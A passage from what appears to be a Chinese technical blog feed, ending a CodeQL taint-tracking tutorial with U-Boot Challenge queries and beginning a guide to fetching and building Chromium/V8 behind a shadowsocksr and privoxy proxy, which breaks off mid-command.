sink.<span class="built_in">toString</span>()</span><br></pre></td></tr></table></figure><h4 id="b-使用全局污点追踪">b. 使用全局污点追踪</h4><p>与局部污点追踪类似，全局污点追踪针对的是全局数据流。全局污点追踪通过其他不保留值的步骤来扩展了全局数据流。</p><p>通过继承<code>TaintTracking::Configuration</code>类以使用全局污点追踪的库函数。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.TaintTracking</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">MyTaintTrackingConfiguration</span> extends TaintTracking::Configuration &#123;</span><br><span class="line">  <span class="built_in">MyTaintTrackingConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;MyTaintTrackingConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123;</span><br><span class="line">    ...</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123;</span><br><span class="line">    ...</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在配置中定义了以下谓词：</p><ul><li><code>isSource</code>：定义污点可能从何处流出</li><li><code>isSink</code>：定义污点可能流入的地方</li><li><code>isSanitizer</code>：可选，限制污点流</li><li><code>isSanitizerGuard</code>：可选，限制污点流</li><li><code>isAdditionalTaintStep</code>：可选，添加其他污染步骤</li></ul><p>使用谓词<code>hasFlow(DataFlow::Node source, DataFlow::Node sink)</code>以执行污点追踪分析。</p><h4 id="c-例子-2">c. 例子</h4><ul><li><p>以下数据流分析用于追踪<strong>从环境变量到打开文件</strong>的数据流</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">EnvironmentToFileConfiguration</span> extends DataFlow::Configuration &#123;</span><br><span class="line">  <span class="built_in">EnvironmentToFileConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;EnvironmentToFileConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123;</span><br><span class="line">    <span class="built_in">exists</span> (Function getenv |</span><br><span class="line">      source.<span class="built_in">asExpr</span>().(FunctionCall).<span class="built_in">getTarget</span>() = getenv <span class="keyword">and</span></span><br><span class="line">      getenv.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;getenv&quot;</span>)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123;</span><br><span class="line">    <span class="built_in">exists</span> (FunctionCall fc |</span><br><span class="line">      sink.<span class="built_in">asExpr</span>() = fc.<span class="built_in">getArgument</span>(<span class="number">0</span>) <span class="keyword">and</span></span><br><span class="line">      fc.<span class="built_in">getTarget</span>().<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from Expr getenv, Expr fopen, EnvironmentToFileConfiguration config</span><br><span class="line">where config.<span class="built_in">hasFlow</span>(DataFlow::<span class="built_in">exprNode</span>(getenv), DataFlow::<span class="built_in">exprNode</span>(fopen))</span><br><span class="line">select fopen, <span class="string">&quot;This &#x27;fopen&#x27; uses data from $@.&quot;</span>,</span><br><span class="line">  getenv, <span class="string">&quot;call to &#x27;getenv&#x27;&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>以下污点追踪代码用于追踪从调用<code>ntohl</code>到操作数组索引的数据流。该代码使用<code>Guards</code>库以识别经过边界检查的表达式，同时还定义了谓词<code>isSanitizer</code>以避免污点分析经过特定数据，最后定义了<code>isAdditionalTaintStep</code>用于将流从边界循环添加至循环索引。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.controlflow.Guards</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.TaintTracking</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NetworkToBufferSizeConfiguration</span> extends TaintTracking::Configuration &#123;</span><br><span class="line">  <span class="built_in">NetworkToBufferSizeConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;NetworkToBufferSizeConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node node) &#123;</span><br><span class="line">    node.<span class="built_in">asExpr</span>().(FunctionCall).<span class="built_in">getTarget</span>().<span class="built_in">hasGlobalName</span>(<span class="string">&quot;ntohl&quot;</span>)</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node node) &#123;</span><br><span class="line">    <span class="built_in">exists</span>(ArrayExpr ae | node.<span class="built_in">asExpr</span>() = ae.<span class="built_in">getArrayOffset</span>())</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isAdditionalTaintStep</span>(DataFlow::Node pred, DataFlow::Node succ) &#123;</span><br><span class="line">    <span class="built_in">exists</span>(Loop loop, LoopCounter lc |</span><br><span class="line">      loop = lc.<span class="built_in">getALoop</span>() <span class="keyword">and</span></span><br><span class="line">      loop.<span class="built_in">getControllingExpr</span>().(RelationalOperation).<span class="built_in">getGreaterOperand</span>() = pred.<span class="built_in">asExpr</span>() |</span><br><span class="line">      succ.<span class="built_in">asExpr</span>() = lc.<span class="built_in">getVariableAccessInLoop</span>(loop)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSanitizer</span>(DataFlow::Node node) &#123;</span><br><span class="line">    <span class="built_in">exists</span>(GuardCondition gc, Variable v |</span><br><span class="line">      gc.getAChild*() = v.<span class="built_in">getAnAccess</span>() <span class="keyword">and</span></span><br><span class="line">      node.<span class="built_in">asExpr</span>() = v.<span class="built_in">getAnAccess</span>() <span class="keyword">and</span></span><br><span class="line">      gc.<span class="built_in">controls</span>(node.<span class="built_in">asExpr</span>().<span class="built_in">getBasicBlock</span>(), _)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from DataFlow::Node ntohl, DataFlow::Node offset, NetworkToBufferSizeConfiguration conf</span><br><span class="line">where conf.<span class="built_in">hasFlow</span>(ntohl, offset)</span><br><span class="line">select offset, <span class="string">&quot;This array offset may be influenced by $@.&quot;</span>, ntohl,</span><br><span class="line">  <span class="string">&quot;converted data from the network&quot;</span></span><br></pre></td></tr></table></figure></li></ul><h2 id="七、CodeQL-U-Boot-Challenge">七、CodeQL U-Boot Challenge</h2><ul><li><p>纸上得来终觉浅，绝知此事要躬行。简单翻阅QL文档是学不到什么的，我们需要自己动手实践一下。</p><p>下面笔者将讲述github learning lab中，用于学习CodeQL的一个入门课程 - <a href="https://lab.github.com/GitHubtraining/codeql-u-boot-challenge-(cc++)">CodeQL U-Boot Challenge (C/C++)</a></p></li><li><p>Step1: 了解从何处获取帮助</p><ul><li><a href="https://lgtm.com/help/lgtm/console/ql-cpp-basic-example">Writing a basic C++ Code QL query</a></li><li><a href="https://help.semmle.com/QL/learn-ql/introduction-to-ql.html">Introduction to CodeQL</a></li><li><a href="https://help.semmle.com/QL/learn-ql/">Learning CodeQL</a></li></ul></li><li><p>Step2: 设置IDE</p><ul><li>下载VSCode以及CodeQL插件，还有CodeQL CLI文件。</li><li>下载<a href="https://github.com/github/vscode-codeql-starter/">CodeQL starter</a>工作区</li><li>下载<a href="https://downloads.lgtm.com/snapshots/cpp/uboot/u-boot_u-boot_cpp-srcVersion_d0d07ba86afc8074d79e436b1ba4478fa0f0c1b5-dist_odasa-2019-07-25-linux64.zip">U-Boot CodeQL database</a>并解压</li><li>克隆<a href="https://github.com/Kiprey/codeql-uboot">当前github课程仓库</a></li><li>将当前课程仓库的文件夹添加至之前下载的VScode starter工作区，同时将之前下载的U-Boot数据库导入至VScode</li><li>一切就绪!</li></ul></li><li><p>Step3: 编写一个简单的查询。在这里我们用于查询<code>strlen</code>函数的定义位置。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function f</span><br><span class="line">where f.<span class="built_in">getName</span>() = <span class="string">&quot;strlen&quot;</span></span><br><span class="line">select f, <span class="string">&quot;a function named strlen&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>Step4: 分析这个简单的查询，之后查询一下<code>memcpy</code>函数</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function f</span><br><span class="line">where f.<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select f, <span class="string">&quot;a function named memcpy&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>Step5: 使用不同的类以及不同的谓语。这里我们编写QL查找名为<code>ntohs</code>、<code>ntohl</code>以及<code>ntohll</code>的宏定义。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp </span><br><span class="line"></span><br><span class="line">from Macro macro</span><br><span class="line"><span class="comment">//where macro.getName() = &quot;ntohs&quot; or macro.getName() = &quot;ntohl&quot; or macro.getName() = &quot;ntohll&quot;</span></span><br><span class="line">where macro.<span class="built_in">getName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>)</span><br><span class="line">select macro</span><br></pre></td></tr></table></figure></li><li><p>Step6: 使用双变量。通过使用多个变量来描述复杂的代码关系，查询特定函数的调用位置。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from FunctionCall c, Function f</span><br><span class="line">where c.<span class="built_in">getTarget</span>() = f <span class="keyword">and</span> f.<span class="built_in">getName</span>() == <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select c</span><br></pre></td></tr></table></figure></li><li><p>Step7:  使用Step6的技巧，查询宏定义的调用位置。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from MacroInvocation invoc</span><br><span class="line">where invoc.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>)</span><br><span class="line">select invoc</span><br></pre></td></tr></table></figure></li><li><p>Step8: 改变select的输出。查找这些宏调用所扩展到的顶级表达式。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from MacroInvocation mi</span><br><span class="line">where mi.<span class="built_in">getMacro</span>().<span class="built_in">getName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>)</span><br><span class="line">select mi.<span class="built_in">getExpr</span>() <span class="comment">// 注意这里的.getExpr()</span></span><br></pre></td></tr></table></figure></li><li><p>Step9：编写一个类。用<code>exists</code>关键字来引入一个临时变量，以设置当前类的数据集合；特征谓词在声明时会被调用以确定当前类的范围，类似于C++构造函数。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NetworkByteSwap</span> extends Expr&#123;</span><br><span class="line">    <span class="built_in">NetworkByteSwap</span>()</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">exists</span>(MacroInvocation mi |</span><br><span class="line">            mi.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>) <span class="keyword">and</span></span><br><span class="line">            <span class="keyword">this</span> = mi.<span class="built_in">getExpr</span>()</span><br><span class="line">          )</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from NetworkByteSwap n</span><br><span class="line">select n, <span class="string">&quot;Network byte swap&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>Step10：数据流分析。若<code>memcpy</code>中<code>length</code>直接来自于远程，而不加以验证，那么这将会产生OOB漏洞。以下编写的CodeQL查询针对的就是这类情况，它将使用全局数据流分析技术，查出真正的CVE漏洞。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.TaintTracking</span><br><span class="line"><span class="keyword">import</span> DataFlow::PathGraph</span><br><span class="line"></span><br><span class="line"><span class="comment">// 设置用于交换网络数据的类</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NetworkByteSwap</span> extends Expr&#123;</span><br><span class="line">    <span class="built_in">NetworkByteSwap</span>()    &#123;</span><br><span class="line">        <span class="built_in">exists</span>(MacroInvocation mi |</span><br><span class="line">            mi.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>) <span class="keyword">and</span></span><br><span class="line">            <span class="keyword">this</span> = mi.<span class="built_in">getExpr</span>()</span><br><span class="line">          )</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 设置污点跟踪的分析信息</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Config</span> extends TaintTracking::Configuration&#123;</span><br><span class="line">    <span class="built_in">Config</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;NetworkToMemFuncLength&quot;</span>&#125;</span><br><span class="line">    <span class="comment">// 覆盖原先的isSource. 该谓语用于表示满足控制流源头的表达式.</span></span><br><span class="line">    <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source)&#123;</span><br><span class="line">        source.<span class="built_in">asExpr</span>() instanceof NetworkByteSwap</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 覆盖原先的isSink, 该谓语用于表示满足控制流尽头的表达式.</span></span><br><span class="line">    <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink)&#123;</span><br><span class="line">        <span class="built_in">exists</span>(FunctionCall c | c.<span class="built_in">getTarget</span>().<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span> <span class="keyword">and</span> sink.<span class="built_in">asExpr</span>() = c.<span class="built_in">getArgument</span>(<span class="number">2</span>))</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 查询</span></span><br><span class="line">from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink</span><br><span class="line">where cfg.<span class="built_in">hasFlowPath</span>(source, sink)</span><br><span class="line">select sink, source, sink, <span class="string">&quot;Network byte swap flows to mmcpy&quot;</span></span><br></pre></td></tr></table></figure></li></ul><h2 id="八、结语">八、结语</h2><ul><li>当我们深入学习Codeql之后，我们就可以使用CodeQL挖掘特定漏洞模式的漏洞。</li><li>CodeQL入门大致如上所示，更深层次的使用需要翻阅各种QL API来结合使用，<a href="https://help.semmle.com/QL/learn-ql/cpp/introduce-libraries-cpp.html">CodeQL library for C and C++</a> 由此进。</li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;CodeQL 是一个语义代码分析引擎，它可以扫描发现代码库中的漏洞。使用 CodeQL，可以像对待数据一样查询代码。编写查询条件以查找漏洞的所有变体并处理，同时可以分享个人查询条件。&lt;/p&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="CodeQL" scheme="https://kiprey.github.io/tags/CodeQL/"/>
    
  </entry>
  
  <entry>
    <title>下拉&amp;编译 chromium&amp;v8 代码</title>
    <link href="https://kiprey.github.io/2020/11/fetch-chromium/"/>
    <id>https://kiprey.github.io/2020/11/fetch-chromium/</id>
    <published>2020-11-19T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.002Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、背景">一、背景</h2><ul><li><p>由于chromium的多线程、多进程机制较为复杂，因此调试起来较为麻烦，通过源代码层面打log来调试显得十分必要，而且源码级调试可以大幅度降低调试难度。</p></li><li><p>同时，倘若需要某个特定版本的chromium时，委托他人代为编译也较为不便，</p></li><li><p>因此，手动编译chromium是十分必要的。在这篇文章中，笔者将自己下拉代码&amp;编译代码的步骤列入其中，仅供参考。</p></li></ul><span id="more"></span><h2 id="二、前置操作">二、前置操作</h2><ul><li><p>由于国内神奇的网络环境，我们需要设置一下代理服务</p></li><li><p>首先在linux端下载shadowsocksr</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> git@github.com:shadowsocksrr/shadowsocksr.git</span><br></pre></td></tr></table></figure><p>修改<code>shadowsocksr/user-config.json</code>的内容</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;server&quot;</span><span class="punctuation">:</span> <span class="string">&quot;&lt;server IP&gt;&quot;</span><span class="punctuation">,</span>          <span class="comment">// 服务器IP</span></span><br><span class="line">    <span class="attr">&quot;server_ipv6&quot;</span><span class="punctuation">:</span> <span class="string">&quot;::&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;server_port&quot;</span><span class="punctuation">:</span> &lt;server Port&gt;<span class="punctuation">,</span>     <span class="comment">// 服务器的ssr端口</span></span><br><span class="line">    <span class="attr">&quot;local_address&quot;</span><span class="punctuation">:</span> <span class="string">&quot;127.0.0.1&quot;</span><span class="punctuation">,</span>     <span class="comment">// 本地地址，这里无需修改</span></span><br><span class="line">    <span class="attr">&quot;local_port&quot;</span><span class="punctuation">:</span> <span class="number">52001</span><span class="punctuation">,</span>              <span class="comment">// 本地用于监听socks5的端口，ssr开启后请求将转发至该端口</span></span><br><span class="line"></span><br><span class="line">    <span class="attr">&quot;password&quot;</span><span class="punctuation">:</span> <span class="string">&quot;&lt;server Password&gt;&quot;</span><span class="punctuation">,</span>  <span class="comment">// 服务器端的ssr密码</span></span><br><span class="line">    <span class="attr">&quot;method&quot;</span><span class="punctuation">:</span> <span class="string">&quot;rc4-md5&quot;</span><span class="punctuation">,</span>              <span class="comment">// 加密方式</span></span><br><span class="line">    <span class="attr">&quot;protocol&quot;</span><span class="punctuation">:</span> <span class="string">&quot;auth_aes128_md5&quot;</span><span class="punctuation">,</span>    <span class="comment">// 协议</span></span><br><span class="line">    <span class="attr">&quot;protocol_param&quot;</span><span class="punctuation">:</span> <span class="string">&quot;&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;obfs&quot;</span><span class="punctuation">:</span> <span class="string">&quot;tls1.2_ticket_auth&quot;</span><span class="punctuation">,</span>     <span class="comment">// obfs</span></span><br><span class="line">    <span class="attr">&quot;obfs_param&quot;</span><span class="punctuation">:</span> <span class="string">&quot;&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;speed_limit_per_con&quot;</span><span class="punctuation">:</span> <span class="number">0</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;speed_limit_per_user&quot;</span><span class="punctuation">:</span> <span class="number">0</span><span class="punctuation">,</span></span><br><span class="line"></span><br><span class="line">    <span class="attr">&quot;additional_ports&quot;</span> <span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span><span class="punctuation">,</span> <span class="comment">// only works under multi-user mode</span></span><br><span class="line">    <span class="attr">&quot;additional_ports_only&quot;</span> <span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span> <span class="comment">// only works under multi-user mode</span></span><br><span class="line">    <span class="attr">&quot;timeout&quot;</span><span class="punctuation">:</span> <span class="number">120</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;udp_timeout&quot;</span><span class="punctuation">:</span> <span class="number">60</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;dns_ipv6&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;connect_verbose_info&quot;</span><span class="punctuation">:</span> <span class="number">0</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;redirect&quot;</span><span class="punctuation">:</span> <span class="string">&quot;&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;fast_open&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>然后进入<code>shadowsocksr/shadowsocks/</code>，执行<code>local.py</code>以启动本地socks5</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> python local.py</span><br></pre></td></tr></table></figure><blockquote><p>还有一个server.py文件，主要用于服务器端建立ssr结点。这里我们不涉及这个，因此忽略该文件。</p></blockquote><p>之后，在本地的<code>local port</code>端口处（按照上面的配置信息，这里应该是52001端口），将会建立一个socks5监听端口。所有发送至该端口的数据将会被转发至远程ssr结点</p><blockquote><p>使用命令<code>netstat -ntlp</code>可以查看端口信息。</p></blockquote></li><li><p>socks5建立完成后，我们需要设置http/https代理转发，使得http/https数据可以被转发至socks5中。</p><p>因此我们需要下载<code>privoxy</code>，之后在其配置文件中追加一句指令开启代理转发，最后启动该服务。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install privoxy</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;forward-socks5 / 127.0.0.1:52001 .&quot;</span> &gt;&gt; /etc/privoxy/config</span><br><span class="line"><span class="built_in">sudo</span> service privoxy start</span><br></pre></td></tr></table></figure></li><li><p>代理服务已经启动完成，现在我们需要设置curl和git使用代理来访问网络。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">export</span> http_proxy=http://127.0.0.1:8118</span><br><span class="line"><span class="built_in">export</span> https_proxy=https://127.0.0.1:8118</span><br><span class="line">git config --global http.proxy http://127.0.0.1:8118</span><br><span class="line">git config --global https.proxy https://127.0.0.1:8118</span><br></pre></td></tr></table></figure></li><li><p>git代理已经设置完成，现在我们来下载最重要的工具<code>depot_tools</code>，这个工具用于下拉chromium/v8代码</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># clone depot_tools，并且把depot_tools的目录加到PATH环境变量</span></span><br><span class="line"><span class="comment"># 因为git加了代理所以第一个命令可以成功clone了</span></span><br><span class="line">git <span class="built_in">clone</span> https://chromium.googlesource.com/chromium/tools/depot_tools.git</span><br><span class="line"><span class="comment"># /path/to/depot_tools改成depot_tools的目录</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;export PATH=$PATH:&quot;/path/to/depot_tools&quot;&#x27;</span> &gt;&gt; ~/.bashrc</span><br><span class="line"><span class="comment"># 重新加载.bashrc配置文件</span></span><br><span class="line"><span class="built_in">source</span> ~/.bashrc</span><br></pre></td></tr></table></figure></li></ul><h2 id="三、chromium代码下拉及编译">三、chromium代码下拉及编译</h2><ul><li><p>chromium的代码下拉只要一句命令，非常简便，但必须使用git代理</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fetch chromium</span><br></pre></td></tr></table></figure><p>所有代码差不多有24G左右，下拉代码的过程中，最重要的是<strong>网络一定要好</strong>！由于git clone不支持断点续传，<strong>一旦下拉代码的过程中存在网络波动导致连接中断，那就功亏一篑了。</strong></p><blockquote><p>下拉chromium的代码只有这一条途径，别想着先下github上的代码再整依赖，这是无用的。</p></blockquote></li><li><p>代码下拉好后，安装一下代码编译所需要的依赖</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> src/build/install-build-deps.sh</span><br></pre></td></tr></table></figure><p>如果该脚本不适用于当前linux版本，则直接尝试编译代码也可以，只不过有时候会提示某个命令无法执行而中断编译，此时只需要手动安装一下对应软件即可。</p></li><li><p>之后设置git分支</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 切换分支，如果编译最新版的话，就不用这行命令</span></span><br><span class="line"><span class="comment"># 如果是要调洞的话，就要在这里切到有漏洞的那个commit</span></span><br><span class="line">git reset --hard [commit <span class="built_in">hash</span> with 